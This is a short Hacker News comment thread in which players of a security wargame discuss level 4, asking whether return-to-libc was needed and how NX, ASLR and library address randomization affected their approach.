Hacker News new | past | comments | ask | show | jobs | submit login

Meh, I got to level 4 but didn't go any further.

Learned a lot, but I'm still not sure if there wasn't a much simpler solution that I missed. Was return-to-libc really required to exploit it, or was I trying to kill a fly with a sledge hammer?




Return-to-libc (a.k.a. ret2libc) is usually used to bypass NX-bit / DEP, but NX was disabled for level04 - the solution does not require return-to-libc.


But it did have ASLR enabled, right? I didn't get how to bypass that without ret2libc.

I think I'll try again tomorrow morning and see what I missed.


On 32-bit machines, you can disable mmap randomization (and thus library randomization) using ulimit -s unlimited.

Also, there's another useful place you can return to that isn't in libc.


ASLR is enabled, yes.

ASLR actually makes ret2libc much more difficult to pull off (esp. on 64-bit platforms), because the location of libc.so itself is randomized.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: